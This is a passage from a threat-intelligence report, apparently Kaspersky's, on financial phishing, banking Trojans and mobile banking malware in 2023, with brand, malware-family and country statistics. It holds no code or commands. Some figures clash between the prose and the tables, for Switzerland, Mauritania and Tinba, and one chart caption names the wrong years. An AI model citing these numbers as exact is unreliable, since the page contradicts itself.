500. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of financial phishing pages by category, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082700/03-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
501. <h3 id="online-shopping-scams">Online shopping scams</h3>
502. <p>Online stores were the most targeted category, comprising more than 40% (41.65%) of all financial phishing pages. Fraudsters impersonated popular online store websites, such as Amazon, eBay and Shopify, as well as brand websites and popular streaming services, such as Spotify and Netflix.</p>
503. <div class="js-infogram-embed" data-id="_/BxtUdnoTTUPLTrkvt9aq" data-type="interactive" data-title="04 EN Financial report graphs" style="min-height:;"></div>
504. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 online shopping brands mimicked by phishing and scam pages, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155936/04-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
505. <p>The most frequently impersonated e-commerce site was Amazon, which was mimicked in more than one third (34%) of all online store phishing attempts. Apple came in second with 18.66% of fraudulent pages, followed by Netflix, with 14.71%.</p>
506. <div id="attachment_112529" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112529" class="size-large wp-image-112529" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-1024x1017.png" alt="Sample of a phishing site that impersonates Amazon" width="1024" height="1017" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-1024x1017.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-300x298.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-150x150.png 150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-768x763.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-352x350.png 352w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-740x735.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-282x280.png 282w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-800x794.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-50x50.png 50w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01.png 1423w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112529" class="wp-caption-text">Sample of a phishing site that impersonates Amazon</p></div>
507. <p>The tenth most-copied site was the Latin American online market MercadoLibre, which was mimicked by 1.77% of phishing pages. Fake sites also frequently targeted Louis Vuitton (5.52%), Shopify (4.73%), Alibaba Group (3.17%), Spotify (3.14%), eBay (3.12%) and Luxottica (2.94%) users.</p>
508. <div id="attachment_112530" style="width: 658px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112530" class="size-large wp-image-112530" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-648x1024.png" alt="Phishing pages impersonating AliExpress, Spotify and Louis Vuitton websites" width="648" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-648x1024.png 648w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-190x300.png 190w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-768x1213.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-973x1536.png 973w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-1297x2048.png 1297w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-222x350.png 222w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-633x1000.png 633w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-177x280.png 177w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02-570x900.png 570w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154705/Financial_report_2023_02.png 1568w" sizes="(max-width: 648px) 100vw, 648px" /></a><p id="caption-attachment-112530" class="wp-caption-text">Phishing pages impersonating AliExpress, Spotify and Louis Vuitton websites</p></div>
509. <p>One of the most common scam types targeting online shoppers consists in cybercriminals offering heavy discounts (which, of course, expire soon), special offers, early access to goods or entertainment, and other &#8220;bargains&#8221;. Both home users and businesses were targeted. For instance, in the screenshot below, a fake page presumably is offering a bus at an attractive price. If the user attempts to buy the vehicle, they are prompted to log in with their eBay account, which is then stolen.</p>
510. <div id="attachment_112531" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112531" class="size-large wp-image-112531" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1024x505.png" alt="Fake page offering a bus at a relatively low price" width="1024" height="505" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1024x505.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-300x148.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-768x378.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-1536x757.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-710x350.png 710w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-740x365.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-568x280.png 568w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03-800x394.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154759/Financial_report_2023_03.png 1810w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112531" class="wp-caption-text">Fake page offering a bus at a relatively low price</p></div>
511. <p>Fraudsters use similar scams on social networks. For example, in the screenshot below, a fake Instagram store is offering Louis Vuitton products.</p>
512. <div id="attachment_112532" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112532" class="size-large wp-image-112532" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-1024x760.png" alt="Fake Louis Vuitton store on Instagram" width="1024" height="760" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-1024x760.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-300x223.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-768x570.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-471x350.png 471w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-740x549.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-377x280.png 377w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04-800x594.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154831/Financial_report_2023_04.png 1064w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112532" class="wp-caption-text">Fake Louis Vuitton store on Instagram</p></div>
513. <p>As new and more secure, authentication technologies appear, scammers find ways to evade these, too. The phishing page in the screenshot below, mimicking the Shopify sign-in form, implements a scenario for when the victim uses a <a href="https://help.shopify.com/en/manual/your-account/logging-in/passkeys" target="_blank" rel="noopener">passkey</a> as the authentication method. Passkeys can only be used on websites and apps they are created for. To authorize <a href="https://developers.google.com/identity/passkeys" target="_blank" rel="noopener">passkey authentication</a>, the user has to unlock the device the passkey was issued for. That means passkeys are of no use to phishers. To trick users into choosing to authenticate with a manually entered one-time code, the fake page displays an error message.</p>
514. <div id="attachment_112533" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112533" class="size-large wp-image-112533" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1024x554.png" alt="Fake Shopify page trying to bypass passkey authentication" width="1024" height="554" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1024x554.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-300x162.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-768x415.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-1536x831.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-647x350.png 647w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-740x400.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-518x280.png 518w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05-800x433.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154902/Financial_report_2023_05.png 1605w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112533" class="wp-caption-text">Fake Shopify page trying to bypass passkey authentication</p></div>
515. <h3 id="payment-system-phishing">Payment system phishing</h3>
516. <p>Payment systems were mimicked in 19.88% of financial phishing attacks detected and blocked by Kaspersky products in 2023.</p>
517. <div class="js-infogram-embed" data-id="_/QDfxNNGdun3BJEfYfUly" data-type="interactive" data-title="05 EN Financial report graphs" style="min-height:;"></div>
518. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 5 payment systems mimicked by phishing and scam pages (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160007/05-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
519. <p>Among these, PayPal (54.73%) was the one that received the most attention, with more than half of attacks using its image.</p>
520. <div id="attachment_112534" style="width: 1012px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112534" class="size-large wp-image-112534" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-1002x1024.png" alt="Fake page targeting PayPal users" width="1002" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-1002x1024.png 1002w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-294x300.png 294w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-768x785.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-343x350.png 343w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-740x756.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-274x280.png 274w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-800x817.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06-50x50.png 50w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154937/Financial_report_2023_06.png 1294w" sizes="(max-width: 1002px) 100vw, 1002px" /></a><p id="caption-attachment-112534" class="wp-caption-text">Fake page targeting PayPal users</p></div>
521. <p>Other most frequently victimized payment systems included MasterCard (16.58%), Visa (8.43%), Interac (4.05%) and PayPay (2.96%). Notably, of these, Visa and MasterCard are typically mimicked on fake payment pages linked to a variety of phishing and scam sites.</p>
522. <h3 id="cryptocurrency-scams">Cryptocurrency scams</h3>
523. <p>In 2023, the number of phishing and scam attacks relating to cryptocurrencies continued to grow. Kaspersky antiphishing technologies prevented 5 838 499 attempts to follow a cryptocurrency-themed phishing link, which is 16% more than in 2022. This may be due to the fact that the Bitcoin rate, after hitting rock bottom in 2022, started to climb again in 2023. With the price of the number-one cryptocurrency setting new records at the beginning of 2024, this trend can be expected to develop further.</p>
524. <p>We have seen a number of different cryptocurrency-related schemes throughout the year. Scammers impersonated well-known cryptocurrency exchanges and offered coins in the name of major companies. Among the most notable schemes was a <a href="https://securelist.com/hot-and-cold-cryptowallet-phishing/110136/" target="_blank" rel="noopener">phishing campaign</a> that targeted hardware crypto cold wallets. This type of wallet, normally disconnected from the internet, is considered quite safe. However, under the guise of a crypto giveaway, the attackers tricked users into connecting their hardware wallets to a fake website.</p>
525. <p>We have also seen crypto wallet phishing using well-known non-cryptocurrency brands as a lure. For example, a phishing website bearing the Apple logo and photos of Apple products invited users to get cryptocurrency called &#8220;AppleCoin&#8221;. Interestingly, a coin under that name does exist, but it has nothing to do with Apple Inc.</p>
526. <div id="attachment_112535" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112535" class="size-large wp-image-112535" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1024x391.png" alt="Phishing website touting AppleCoin in the name of Apple Inc" width="1024" height="391" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1024x391.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-300x114.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-768x293.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-1536x586.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-2048x781.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-918x350.png 918w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-740x282.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-734x280.png 734w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155022/Financial_report_2023_07-800x305.png 800w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112535" class="wp-caption-text">Phishing website touting AppleCoin in the name of Apple Inc</p></div>
527. <p>If the user believes that Apple has at last issued its own cryptocurrency and enters their wallet credentials, the scammers grab their funds.</p>
528. <h2 id="pc-malware">PC malware</h2>
529. <p>In 2023, the decline in the number of users affected by financial PC malware continued. Our data showed a decrease from 350,808 in 2022 to 312,453 in 2023, reflecting an 11% drop. This trend has persisted for the past years, and there are several reasons for that. First, users increasingly prefer mobile banking, and sign in to their online bank accounts on PCs less frequently than on smartphones. Although they may still store their banking credentials in browsers on their desktop computers, most notorious banking malware for PCs was repurposed to deliver other malware, such as ransomware, to infected systems. Often, these banking Trojans are used in more sophisticated targeted attacks, which usually means they infect fewer users.</p>
530. <div class="js-infogram-embed" data-id="_/2ZwjMzgN2sPpUkWc7Tkv" data-type="interactive" data-title="06 EN Financial report graphs" style="min-height:;"></div>
531. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of unique users attacked by banking malware in 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160037/06-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
532. <p>As can be seen in the graph above, banking malware attacks spiked in March. This coincided with a fourfold increase in <a href="https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/#emotet" target="_blank" rel="noopener">Emotet</a>&#8216;s activity, which was its last large-scale campaign observed in 2023.</p>
533. <h3 id="key-banking-malware-actors">Key banking malware actors</h3>
534. <p>The notable strains of banking Trojans in 2023 included Ramnit (35.1%), Zbot (22.5%) and Emotet (16.2%), which remained the top three financial malware families for the PC. The percentages of all three grew compared to 2022, together comprising nearly three-quarters of all financial malware attacks on desktop computers.</p>
535. <table width="100%">
536. <tbody>
537. <tr>
538. <td width="25%"><strong>Name</strong></td>
539. <td width="60%"><strong>Verdict</strong></td>
540. <td width="15%"><strong>%*</strong></td>
541. </tr>
542. <tr>
543. <td>Ramnit/Nimnul</td>
544. <td>Trojan-Banker.Win32.Ramnit</td>
545. <td>35.1</td>
546. </tr>
547. <tr>
548. <td>Zbot/Zeus</td>
549. <td>Trojan-Banker.Win32.Zbot</td>
550. <td>22.5</td>
551. </tr>
552. <tr>
553. <td>Emotet</td>
554. <td>Trojan-Banker.Win32.Emotet</td>
555. <td>16.2</td>
556. </tr>
557. <tr>
558. <td>CliptoShuffler</td>
559. <td>Trojan-Banker.Win32.CliptoShuffler</td>
560. <td>6.9</td>
561. </tr>
562. <tr>
563. <td>Danabot</td>
564. <td>Trojan-Banker.Win32.Danabot</td>
565. <td>2.2</td>
566. </tr>
567. <tr>
568. <td>Tinba</td>
569. <td>Trojan-Banker.Win32.Tinba</td>
570. <td>2.1</td>
571. </tr>
572. <tr>
573. <td>SpyEyes</td>
574. <td>Trojan-Spy.Win32.SpyEye</td>
575. <td>1.9</td>
576. </tr>
577. <tr>
578. <td>Qbot/Qakbot</td>
579. <td>Trojan-Banker.Win32.Qbot</td>
580. <td>1.8</td>
581. </tr>
582. <tr>
583. <td>BitStealer</td>
584. <td>Trojan-Banker.Win32.BitStealer</td>
585. <td>1.3</td>
586. </tr>
587. <tr>
588. <td>IcedID</td>
589. <td>Trojan-Banker.Win32.IcedID</td>
590. <td>1.2</td>
591. </tr>
592. </tbody>
593. </table>
594. <p><em>* Unique users who encountered this malware family as a percentage of all users attacked by financial malware</em></p>
595. <p>These three Trojans have a range of capabilities apart from stealing banking credentials. They can download additional modules and third-party malware, collect various types of data, such as passwords stored in browsers, and perform other malicious activities.</p>
596. <p>Fourth and fifth were CliptoShuffler (6.9%) and Danabot (2.2%), both frequently appearing in the rankings, and in sixth place was Tinba (2.2%), also known as &#8220;Tiny Banker Trojan&#8221;. Although we have not seen this family among the most active banking Trojans in previous years, it dates back to 2012, and its source code has been leaked. It is written in Assembler and gets its name for a remarkably small size.</p>
597. <p>Among other most active banking malware types were SpyEyes (1.9%), <a href="https://securelist.com/qbot-banker-business-correspondence/109535/" target="_blank" rel="noopener">QakBot</a> (1.8%), BitStealer (1.3%) and IcedID (1.2%).</p>
598. <h3 id="brazilian-malware">Brazilian malware</h3>
599. <p>While the overall number of desktop financial malware attacks has steadily declined, we have observed a <a href="https://securelist.com/kaspersky-security-bulletin-crimeware-financial-threats-2024/111093/#resurgence-of-brazilian-banking-trojans" target="_blank" rel="noopener">trend</a> for Brazilian families attempting to fill the void. In the beginning of 2023, we shared insights into new functionality added to <a href="https://securelist.com/prilex-modification-now-targeting-contactless-credit-card-transactions/108569/" target="_blank" rel="noopener">Prilex</a>, a type of malware known to target ATMs and PoS (point of sale) terminals. Kaspersky experts found the new modification was specifically designed to exploit contactless payments. When someone tries to pay with a contactless card, the infected PoS terminal displays an error message, prompting the buyer to insert the card and thus helping attackers to capture sensitive payment details. Cybercriminals can then run unauthorized transactions and potentially steal large sums of money from unsuspecting victims.</p>
600. <p>Another interesting malware strain is <a href="https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/#gopix" target="_blank" rel="noopener">GoPIX</a>, which targets the Brazilian instant payment system <a href="https://en.wikipedia.org/wiki/Pix_(payment_system)" target="_blank" rel="noopener">PIX</a>. It spreads by impersonating the WhatsApp web app. Once successfully installed, it starts monitoring clipboard contents. If the malware detects PIX transaction data, it substitutes it with malicious data, tricking the user into transferring money to cybercriminals. It targets Bitcoin and Ethereum transactions in the same manner.</p>
601. <p>Recently, our Global Research and Analysis Team (GReAT) discovered <a href="https://securelist.com/coyote-multi-stage-banking-trojan/111846/" target="_blank" rel="noopener">Coyote</a>, a new banking Trojan of Brazilian origin. Targeting more than 60 banking institutions, primarily in Brazil, this malware uses a sophisticated infection chain that utilizes various relatively new technologies. Spreading via the Squirrel installer, it leverages a NodeJS environment and the Nim programming language to complete infection. Coyote is capable of keylogging, taking screenshots, and setting up fake pages to steal user credentials.</p>
602. <h3 id="geography-of-pc-banking-malware-attacks">Geography of PC banking malware attacks</h3>
603. <p>To highlight the countries where financial malware was most prevalent in 2023, we calculated the share of users who encountered banking Trojans in the total number attacked by any type of malware in the country. The following statistics indicate where users are most likely to encounter financial malware.</p>
604. <p>The highest share of banking Trojans was registered in Afghanistan (6%), Turkmenistan (5.2%) and Tajikistan (3.7%). Switzerland (3.2%) and Mauritania (3%) were also among the worst affected by this type of threats.</p>
605. <p>TOP 20 countries by share of attacked users</p>
606. <table width="100%">
607. <tbody>
608. <tr>
609. <td width="70%"><strong>Country*</strong></td>
610. <td width="30%"><strong>%**</strong></td>
611. </tr>
612. <tr>
613. <td>Afghanistan</td>
614. <td>6</td>
615. </tr>
616. <tr>
617. <td>Turkmenistan</td>
618. <td>5.2</td>
619. </tr>
620. <tr>
621. <td>Tajikistan</td>
622. <td>3.7</td>
623. </tr>
624. <tr>
625. <td>China</td>
626. <td>3.2</td>
627. </tr>
628. <tr>
629. <td>Switzerland</td>
630. <td>3</td>
631. </tr>
632. <tr>
633. <td>Mauritania</td>
634. <td>2.4</td>
635. </tr>
636. <tr>
637. <td>Sudan</td>
638. <td>2.3</td>
639. </tr>
640. <tr>
641. <td>Egypt</td>
642. <td>2.2</td>
643. </tr>
644. <tr>
645. <td>Syria</td>
646. <td>2.1</td>
647. </tr>
648. <tr>
649. <td>Yemen</td>
650. <td>2</td>
651. </tr>
652. <tr>
653. <td>Paraguay</td>
654. <td>2</td>
655. </tr>
656. <tr>
657. <td>Algeria</td>
658. <td>1.9</td>
659. </tr>
660. <tr>
661. <td>Venezuela</td>
662. <td>1.9</td>
663. </tr>
664. <tr>
665. <td>Uzbekistan</td>
666. <td>1.7</td>
667. </tr>
668. <tr>
669. <td>Libya</td>
670. <td>1.7</td>
671. </tr>
672. <tr>
673. <td>Zimbabwe</td>
674. <td>1.7</td>
675. </tr>
676. <tr>
677. <td>Spain</td>
678. <td>1.6</td>
679. </tr>
680. <tr>
681. <td>Pakistan</td>
682. <td>1.6</td>
683. </tr>
684. <tr>
685. <td>Iraq</td>
686. <td>1.6</td>
687. </tr>
688. <tr>
689. <td>Thailand</td>
690. <td>1.5</td>
691. </tr>
692. </tbody>
693. </table>
694. <p><em>* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.</em><br />
695. <em>** Unique users whose computers were targeted by financial malware as a percentage of all Kaspersky users who encountered malware in the country.</em></p>
696. <h3 id="types-of-attacked-users">Types of attacked users</h3>
697. <p>Consumers (61.2%) were the main target of financial malware attacks in 2023, with their share unchanged from 2022.</p>
698. <div class="js-infogram-embed" data-id="_/I7U0avE5vXj2GJDgfZvo" data-type="interactive" data-title="07 EN Financial report graphs" style="min-height:;"></div>
699. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Financial malware attack distribution by type (corporate vs consumer), 2021–2022 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160107/07-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
700. <h2 id="mobile-malware">Mobile Malware</h2>
701. <p>In 2023, 32% more Android users encountered mobile banking malware than in the previous year: 75,521 attacks compared to 57,219 in 2022. Moreover, we observed notable growth in the number of affected users in the last quarter of the year, which may be due to a new financial malware family called Mamont that targets mainly users in the CIS.</p>
702. <div class="js-infogram-embed" data-id="_/2FFnOfY8x3bKX5CRjcW1" data-type="interactive" data-title="08 EN Financial report graphs" style="min-height:;"></div>
703. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of Android users attacked by banking malware by month, 2022–2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03160135/08-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
704. <p>The most active Trojan banker was Bian.h (22.22%), followed by Agent.eq (20.95%), whose share grew by 17.50 pp compared to 2022. Third was Faketoken.pac, which affected 5.33% of all users who encountered mobile financial threats in 2023.</p>
705. <table width="100%">
706. <tbody>
707. <tr>
708. <td width="40%"><strong>Verdict</strong></td>
709. <td width="15%"><strong>%*, 2022</strong></td>
710. <td width="15%"><strong>%*, 2023</strong></td>
711. <td width="15%"><strong>Difference in pp</strong></td>
712. <td width="15%"><strong>Change in ranking</strong></td>
713. </tr>
714. <tr>
715. <td>Trojan-Banker.AndroidOS.Bian.h</td>
716. <td>23.78</td>
717. <td>22.22</td>
718. <td>-1.56</td>
719. <td>0</td>
720. </tr>
721. <tr>
722. <td>Trojan-Banker.AndroidOS.Agent.eq</td>
723. <td>3.46</td>
724. <td>20.95</td>
725. <td>+17.50</td>
726. <td>+6</td>
727. </tr>
728. <tr>
729. <td>Trojan-Banker.AndroidOS.Faketoken.pac</td>
730. <td>6.42</td>
731. <td>5.33</td>
732. <td>-1.09</td>
733. <td>+1</td>
734. </tr>
735. <tr>
736. <td>Trojan-Banker.AndroidOS.Agent.cf</td>
737. <td>1.16</td>
738. <td>4.84</td>
739. <td>+3.68</td>
740. <td>+13</td>
741. </tr>
742. <tr>
743. <td>Trojan-Banker.AndroidOS.Agent.ma</td>
744. <td>0.00</td>
745. <td>3.74</td>
746. <td>+3.74</td>
747. <td></td>
748. </tr>
749. <tr>
750. <td>Trojan-Banker.AndroidOS.Agent.la</td>
751. <td>0.04</td>
752. <td>3.20</td>
753. <td>+3.16</td>
754. <td></td>
755. </tr>
756. <tr>
757. <td>Trojan-Banker.AndroidOS.Anubis.ab</td>
758. <td>0.00</td>
759. <td>3.00</td>
760. <td>+3.00</td>
761. <td></td>
762. </tr>
763. <tr>
764. <td>Trojan-Banker.AndroidOS.Agent.lv</td>
765. <td>0.00</td>
766. <td>1.81</td>
767. <td>+1.81</td>
768. <td></td>
769. </tr>
770. <tr>
771. <td>Trojan-Banker.AndroidOS.Agent.ep</td>
772. <td>4.17</td>
773. <td>1.74</td>
774. <td>-2.44</td>
775. <td>-4</td>
776. </tr>
777. <tr>
778. <td>Trojan-Banker.AndroidOS.Mamont.c</td>
779. <td>0.00</td>
780. <td>1.67</td>
781. <td>+1.67</td>
782. <td></td>
783. </tr>
784. </tbody>
785. </table>
786. <p><em>* Unique users who encountered this malware as a percentage of all Kaspersky mobile security users who encountered banking threats.</em></p>
787. <h3 id="geography-of-the-attacked-mobile-users">Geography of the attacked mobile users</h3>
788. <p>To find out which countries were worst affected by mobile financial malware in 2023, we calculated the percentage of users who encountered mobile banking Trojans among all active Kaspersky users in the country. Users in Turkey were attacked the most at 2.98%, with Saudi Arabia coming in second at 1.43% and Spain (1.38%) in third place.</p>
789. <p>TOP 10 countries by number of users who encountered mobile banking malware, 2023:</p>
790. <table width="100%">
791. <tbody>
792. <tr>
793. <td width="70%"><strong>Country*</strong></td>
794. <td width="30%"><strong>%**</strong></td>
795. </tr>
796. <tr>
797. <td>Turkey</td>
798. <td>2.98%</td>
799. </tr>
800. <tr>
801. <td>Saudi Arabia</td>
802. <td>1.43%</td>
803. </tr>
804. <tr>
805. <td>Spain</td>
806. <td>1.38%</td>
807. </tr>
808. <tr>
809. <td>Switzerland</td>
810. <td>1.28%</td>
811. </tr>
812. <tr>
813. <td>India</td>
814. <td>0.60%</td>
815. </tr>
816. <tr>
817. <td>Japan</td>
818. <td>0.52%</td>
819. </tr>
820. <tr>
821. <td>Italy</td>
822. <td>0.42%</td>
823. </tr>
824. <tr>
825. <td>South Korea</td>
826. <td>0.39%</td>
827. </tr>
828. <tr>
829. <td>Azerbaijan</td>
830. <td>0.24%</td>
831. </tr>
832. <tr>
833. <td>Colombia</td>
834. <td>0.24%</td>
835. </tr>
836. </tbody>
